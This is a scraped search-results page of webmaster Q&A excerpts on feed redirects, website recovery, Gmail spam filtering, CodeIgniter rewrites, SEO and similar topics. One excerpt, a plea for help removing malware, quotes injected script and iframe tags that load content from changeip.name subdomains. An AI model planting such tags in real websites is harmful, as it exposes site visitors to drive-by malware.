Search Results

Search found 9728 results on 390 pages for 'meysam pro'.

Page 109/390 | < Previous Page | 105 106 107 108 109 110 111 112 113 114 115 116  | Next Page >

  • 301 redirecting a blog's RSS feed URL?

    - by Marc Charbonneau
    I moved my personal blog from Wordpress to Ghost this weekend, which changes the RSS feed URL from /feed/ to /rss/. By default Ghost returns a 301 redirect for /feed/, which I've verified by checking the response header and looking at the logs: In Feedly though, new posts aren't being picked up (at least after 24 hours. I'm not sure if they might have a waiting period before updating the URL). What's the correct thing to do in this situation? Do I need to keep /feed/ alive instead of returning a 301? If so, is there a rewrite rule that would let me do this in nginx instead of having to modify the Ghost source code?

    Read the article

  • What are some good services for brainstorming domain name ideas? [closed]

    - by Clay Nichols
    Possible Duplicate: Is there a domain search tool on the web that works well? I've run across a few of these but can't remember them right now (and I've probably missed a few good ones). The idea is that you provide some input (a word(s)) and it comes up with synonyms, rhyming words, etc. Ideally, I'd want to have some confidence that they aren't just registering all the domains I come up with.

    Read the article

  • Recovering a lost website with no backup?

    - by Jeff Atwood
    Unfortunately, our hosting provider experienced 100% data loss, so I've lost all content for two hosted blog websites: http://blog.stackoverflow.com http://www.codinghorror.com (Yes, yes, I absolutely should have done complete offsite backups. Unfortunately, all my backups were on the server itself. So save the lecture; you're 100% absolutely right, but that doesn't help me at the moment. Let's stay focused on the question here!) I am beginning the slow, painful process of recovering the website from web crawler caches. There are a few automated tools for recovering a website from internet web spider (Yahoo, Bing, Google, etc.) caches, like Warrick, but I had some bad results using this: My IP address was quickly banned from Google for using it I get lots of 500 and 503 errors and "waiting 5 minutes…" Ultimately, I can recover the text content faster by hand I've had much better luck by using a list of all blog posts, clicking through to the Google cache and saving each individual file as HTML. While there are a lot of blog posts, there aren't that many, and I figure I deserve some self-flagellation for not having a better backup strategy. Anyway, the important thing is that I've had good luck getting the blog post text this way, and I am definitely able to get the text of the web pages out of the Internet caches. Based on what I've done so far, I am confident I can recover all the lost blog post text and comments. However, the images that go with each blog post are proving…more difficult. Any general tips for recovering website pages from Internet caches, and in particular, places to recover archived images from website pages? (And, again, please, no backup lectures. You're totally, completely, utterly right! But being right isn't solving my immediate problem… Unless you have a time machine…)

    Read the article

  • Why not AJAX'ify entire websites?

    - by Anonymous -
    Is there any solid reasoning as to why sites shouldn't be developed with ajax functionality that loads major parts of each part (assuming there are elements like the header, navigation etc that remain the same)? Surely it would be less resource-intensive since the server wouldn't have to serve content that appears on every page, benefiting both the host and end-user. Answer the question taking into consideration: The sites javascript behaviour degrades gracefully in every instance For my question I'm talking about new sites where this behaviour could be implemented rather from the off, so it doesn't technically cost any money - we're not returning to a finished product to implement it.

    Read the article

  • I'm using a shared server, and as such Gmail marks my email as spam (all from headers are different from the same IP)

    - by chipperyman573
    I have a shared server, meaning many people share the same IP. When I send an email, the @website.com is different from someone else that shares the same IP with me, therefore Gmail marks it as spam. For example: My website's IP is 1.2.3.4. My website is mywebsite.com Person 2's website's IP is hosted by the same host, and as such their IP is 1.2.3.4 Person 2's website is person2.com. When they send an email, it gets sent from [email protected] When I send an email, it gets sent from [email protected] According to Gmail's spam thing: "Use the same address in the 'From:' header on every bulk mail you send." Again, the only similarities between our websites is the IP. However, this causes Gmail to mark both our mail as spam. Is there a way to sort this out with Gmail?

    Read the article

  • Duplicate Content Problem due to plugin

    - by Amar Ryder
    Actually i am running website on wordpress where i have installed Transposh plugin on my site 'example'. Unfortunately, despite having English as the default language and therefore available at example.com/xxx, Google is indexing example.com/en/xxx so i m getting problem with duplicate content now i want to remove this plugin and links from google so that my content will be refine without getting duplicate content pages. Do you have any solution to do this safely. I think myself to remove this plugin from website, though it will create 404 errors from google links but i can add redirect code in htaccess till google would remove that "example.com/en/xxx " not found links. If you know any other healthy way to handle this please help me!

    Read the article

  • How to get users to commit and collaborate to make a website valuable? [closed]

    - by AzizAG
    I own a website that requires a fairly largish amount of users to collaborate and commit occasionally to make the website valuable, so basically, the website can't be any valuable without users helping me put some content on it. To not get confused, I'm thinking of websites like Wikipedia, Stack Exchange and Yahoo! Answers, most of the content is based on peer effort. How do they actually get users interested and committed in the first place? What are the things I have to do to get users involved in the website and actually help me grow it bigger?

    Read the article

  • How to remove this malware

    - by muratto12
    Some files in my site contains some extra lines. After I've deleted them manually, I find them corrupted again some time later. it is all coming from http://*.changeip.name/ some js files. How can I remove them? <!--pizda--><script type='text/javascript' src='http://m2.changeip.name/validate.js?ftpid=15035'></script><!--/pizda--> <iframe src=http://pizda.changeip.name/?f=1065433 framebor der=0 marginheight=0 marginwidth=0 scrolling=0 width=5 heigh t=5 border=0> <iframe src=http://kuku.changeip.name/?f=1065433 framebord er=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height =5 border=0>

    Read the article

  • how to save a png as a smaller file but the same resolution?

    - by Radek
    not sure what stackexchange site is the best for this question. I have a scanned jpg file with below properties and size 8.5MB pixel dimension: 2468 × 3484 pixels print size: 208.96 × 294.98 millimeters resolution: 300 × 300 ppi I need to save the file as png while the size cannot be bigger than 4MB. The most important is that the size of picture must remain the same. I mean that the object size in the picture must stay the same. Could anybody tell me what is used to define the size of the objects in the picture?

    Read the article

  • Lost Traffic from Google Because of Meta-tag Adding

    - by Marian
    I have a site aroundnails.com. It has English version on subdomain en.aroundnails.com. Reading about language related meta-tags for Google, I have placed such a meta tag on the main page of main site: <link rel="alternate" hreflang="en" href="http://en.aroundnails.com/" /> By this way I have tried to say Google, that my site on en.aroundnails.com is the english version of main site, not a duplicate. After a fortnight I have lost a huge part of traffic from Google, more than a half. At the beginning of September I have moved this meta-tag, but traffic remained at the same level. Hope somebody can help me to solve this issue.

    Read the article

  • Page Titles - Including gender of a fashion product in page titles?

    - by Cedric
    I need a bit of help to decide whether it is worth including gender in page titles. In the webmaster tools: I looked at our search queries that include "women", and they account for 9% of our total search queries for the site. I am wondering if it is the right way assess the benefit of including "woman" or "men" in page titles, looking at it with existing results pointing to us already? Is there another tool that I can check the actual queries that may not include us in search results? Like google insights maybe? http://www.google.com/insights/search/#q=shoes%2Cshoes%20for%20women&cmpt=q So it looks like 1.1% of searches for "shoes" are also "shoes for women" is that correct? As a direct comparison, doing the same analysis on our own search queries, I get 1.8% when comparing "shoes for women" to "shoes" Implementing this automation would probably affect 99% of our site if not more, splitting it in 2 segments (one portion of page titles including "women" and the other including "men") Will doing so create a massively repetitive keyword throughout the site, hurting SEO? http://support.google.com/webmasters/bin/answer.py?hl=en&answer=35624 (see "Avoid repeated or boilerplate titles.")

    Read the article

  • How long does it take for Google to re-index pages or update the link titles?

    - by ElHaix
    On one of our classified sites, when doing site:[mysite.com] in Google, the link text is simply [product name] - [mysite.com], where as it should read [product name] classifieds for sale in... I suspect that the site map may have been submitted when we just had [product name], and updated the page titles later. However, it has been a couple of weeks that I have confirmed the longer page titles, and still they appear shortened in organic results. How can I get this looking right in Google's organic results?

    Read the article

  • .htaccess do not work without index.php on CodeIgniter

    - by Mattia
    I have read a lot of topic with the same problem but I do not find the solution. I have a LAMP into Ubuntu server. My document root is /home/utente/ into this dir I have another dir (turni) with a CodeIgniter web app. The web app works fine with the index.php into the URL, but I want to eliminate it. I have this configuration: config.php into CodeIgniter: $config['index_page'] = ''; .htaccess: RewriteEngine On RewriteBase / RewriteCond %{REQUEST_URI} ^system.* RewriteRule ^(.*)$ /index.php?/$1 [L] RewriteCond %{REQUEST_URI} ^application.* RewriteRule ^(.*)$ /index.php?/$1 [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ index.php?/$1 [L] /etc/apache2/sites-available/default: <VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot /home/utente <Directory /> Options FollowSymLinks AllowOverride None </Directory> <Directory /home/utente/> Options Indexes FollowSymLinks MultiViews AllowOverride None Order allow,deny allow from all </Directory> ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/ <Directory "/usr/lib/cgi-bin"> AllowOverride None Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch Order allow,deny Allow from all </Directory> ErrorLog ${APACHE_LOG_DIR}/error.log # Possible values include: debug, info, notice, warn, error, crit, # alert, emerg. LogLevel warn CustomLog ${APACHE_LOG_DIR}/access.log combined Alias /doc/ "/usr/share/doc/" <Directory "/usr/share/doc/"> Options Indexes MultiViews FollowSymLinks AllowOverride None Order deny,allow Deny from all Allow from 127.0.0.0/255.0.0.0 ::1/128 </Directory> When I open a link of the web app without index.php into the URL, the server show me this error: The requested URL /turni/auth/login was not found on this server. Why? If I put the index.php like /turni/index.php/auth/login all works fine.

    Read the article

  • Streaming audio from a webpage

    - by luca590
    I want to be able to stream audio from another webpage through mine, but i do not know how to find the url for each audio file located on a separate webpage. It would also be extremely helpful to do everything in bulk so instead of writing a separate line of code for each audio file, simply writing a few lines of code to upload links to 100 audio files, etc. I am also using Ruby on Rails for my webpage. How do you find a file located on a separate webpage? Does anyone know, if possible how, to upload file links in bulk?

    Read the article

  • Weird unexpected image compression on a web server running Apache on Ubuntu?

    - by Billy Bob Thornton
    I have a weird problem on my production web server running Apache on Ubuntu: it compresses my images thereby dramatically lowering their quality! Actually I have two virtual hosts running, each located in a different folder. Wether I display .gif images by navigating on the two sites, or acceding them directly by their url, their size and quality are invariably degraded. I tried with three different browsers: same problem. Using them on other sites on the Web: no problem. Of course I disabled mod_deflate on the server (which should not compress images anyway), but the phenomenon remains. On my local développement server, running the same configuration, everything is Ok. Now I'm completely lost! For the record, my configuration: Ubuntu 10.04, Apache 2, Php 5.

    Read the article

  • A record DNS, nameserver help

    - by Josip Gòdly Zirdum
    I just installed kloxo on my vps and I want to link my domain to that server...which it sort of already is...I made it connect to it via an A record. That works, like the IP is pointing to my server but how do I make a website using it. I tried adding the domain but this doesn't work ...I feel i'm not explaining this well um, on my server it asked me to create DNS template so I did I created the nameservers ns1.mydomain.com, ns2.mydomain.com Then I added the domain to the panel mydomain.com I go to the folder it creates to it, but no matter the file there it wont work...any ideas? Is there a way to possibly just not even add a domain to kloxo and just kind of treat the ip of the server as the domain? Since the A record points there anyway? I don't intend to host another website on the server anyway...

    Read the article

  • What is more preferable, Creating dedicated domains for mobile apps that shares different content or associate them with folders in one domain?

    - by Abdullah Al-Khalidi
    I want to consult you in an SEO matter which i am completely lost with, I've built a social mobile application that allows users to share text content and made all the content that appears on the application available via the web through dedicated links, however, those links cannot be navigated through the website but they are generated when users shares content through the app to social media networks. I've implemented this method on three applications with totally different content, and I've directed all generated URLs to be from the main company website which is http://frootapps.com so when users shares something, the url will change to http://frootapps.com/qareeb/share.aspx?data=127311. My question, which one is more preferable, a dedicated website for each app that uses such method? or it is ok to keep doing it the same way I am doing it?

    Read the article

  • How should I deal with user agent parsing in logs?

    - by Mr. Jefferson
    My web app project includes logging functionality so we can see where visitors are coming from (referrer URL), what the popular user agents are, what pages are most popular, etc. The log is stored in SQL Server, and when I query the user agents I use a large (almost 100 lines) and growing CASE statement to separate the user agents using string matching (i.e. if the user agent contains the string "Firefox/9" then it's Firefox 9). Is there a better way to do this so I don't have to continually add to that CASE statement to deal with new browser releases? Also, how should I deal with less common, weird/unknown user agents? I've seen the following in the logs and been unable to find good information online about what they are: WordPress/3.3.1; http://www.facecolony.org Mozilla/4.0 ( http://www.hairirons.org redips; <a href=http://hairirons.org/>chi hair iron</a>) I'd guess they're bots/crawlers, but the sites they point to don't appear to reference web crawlers (or even be available sometimes). I've seen other user agents aren't familiar to me, but I know they're bots because they include "bot" or "spider" or something similar in them.

    Read the article

  • Daily Blog Archives and Duplicate Content

    - by nemmy
    A few weeks back I realised that my blog software was creating daily post archives. Which basically resulted in duplicate content especially if I only had one post a day. The situation is something like this: www.sitename.com/blog/archives/2013/06/01 - daily archive for 1 June 2013 www.sitename.com/blog/archives/2013/06/my-post-name.html So, here we have two pages that are basically identical except the daily archive has some meaningless title like "Daily Archive for 1 June 2003". And I have no control over which content Google decides is the primary content. It's quite possible (and likely) that the daily archive could be the "primary" content and the actual post itself the "duplicate". Once I realised it was doing this I modified the daily archive template to include <meta name="robots" content="noindex"> Here we are a few weeks later and I still see some daily archives coming up in Google search results. I realise some of those deep pages might not be crawled yet but I am worried that the original post (which should be the PRIMARY content) has been marked duplicate content by Google. Now I've no indexed the daily archives I might end up with no indexed content AND the original articles still flagged as duplicates. And nothing will show up in search at all. Have I screwed myself here or is there a way out?

    Read the article

  • how to setup a webhosting site ?

    - by Thomas John
    Hi all, I have purchased a cPanel/WHM web hosting reseller account and I want to set up a site for people to set up a hosting accounts. I also would like to have a domain name registration system on the site, so people can register the domain name they would like to host with me. How can I do this? Are there any ready-made scripts available or should I create my own script using the WHM API? Thanks a lot.

    Read the article

  • Good free CSS Sprite for icons

    - by Saif Bechan
    I am working on a small project where I need some of the basic icons: edit, favorite, delete. You know them. Now i can download them all seperate, and put them together in a sprite, but I was wondering if there are ready to download sprites which I can use. Now I am working on an accounting app, so it would be nice if the icons were not too childish. A little but of fancy business type icons. Thanks

    Read the article

  • jQuery mobile List-View is not working after adding some jquery code [closed]

    - by Kaidul Islam Sazal
    I am using jquery mobile and I have an array makeArrayin jquery and I have created few listview by the values of the array.Everything works fine.But the jquery mobile list-view style is not shown. Rather it is shown an ordinary list view. This is my code: $(document).ready(function(){ var url = "inventory/inventory.json"; var makeArray = new Array(); $.getJSON(url, function(data){ $.each(data, function(index, item){ if(($.inArray(item.make, makeArray)) == -1){ makeArray.push(item.make); $('.upper_case') .append('<li data-icon="list-arrow"> <a href="trade_form.php?='+ item.make +'"><img src="images/car_logo/buick.png" class="ui-li-thumb"/>' + item.make + '</a></li>'); } }); }); });

    Read the article

  • Finding terms surrounding a trending hashtag?

    - by aendrew
    I'm looking for a way to find "sub-trends", or words that are trending beneath a larger trend. For instance, say "#foo" is the hashtag for a conference. Searching for "#foo" only gives you a general overview of what people are talking about -- if "#foo" moves too quickly, it becomes really difficult to track disparite conversations at #foo. If "#bar" and "#abc" are two different sessions at "#foo", one can find more specific information by searching for "#foo #bar" or "#foo #abc"; yet, how would one find out about the existence of these surrounding hashtags, i.e., sub-trends? If you look at the screenshot for Peoplebrowsr, there's a panel that looks for "words surrounding [trend]," which seems to be exactly what I'm looking for. Is there a way to accomplish this more simply, i.e., without paying $149 /mo. for Peoplebrowsr? Thanks! Update: Another service that can do this is Twazzup (click for example). The "Community" panel has some limited info on surrounding words; is there a tool that does this, but with more detail?

    Read the article

  • Groups page is blank in SharePoint 2010 [migrated]

    - by Murali Ramakrishnan
    Sometimes it's very confusing how Sharepoint 2010 group creation works Here's a scenario we have been facing from a long time wrt groups in SharePoint 2010 We had requirement of creating a two custom groups followed by creating a custom site through programmatically, For the most case the scenario works as how it is excepted to work. but, out of 1/100 site creation process the groups creation fails, which means we were able to access the group and users associated with it through programmatically. but, when it comes to UI stand point if you try to access the specific group page from the site permissions page - SharePoint returns a BLANK WHITE Page... BLANK WHITE Page... nothing else... Ain't is this a Sharepoint 2010 issue. or anybody had this problem and fixed it. Kindly share your thoughts

    Read the article

  • Privacy policy and terms of use language

    - by L. De Leo
    I have a Czech registered business with which I'm serving a web app mostly (but not exclusively) targeted to Italian customers. The server is in Amsterdam. The site will be multilingual (with 4 languages supported) but for now it's Italian only. What language should the privacy policy and terms and conditions be? What law should they refer to? Could I just offer these two docs in English? (Easier to write and to maintain)

    Read the article

< Previous Page | 105 106 107 108 109 110 111 112 113 114 115 116  | Next Page >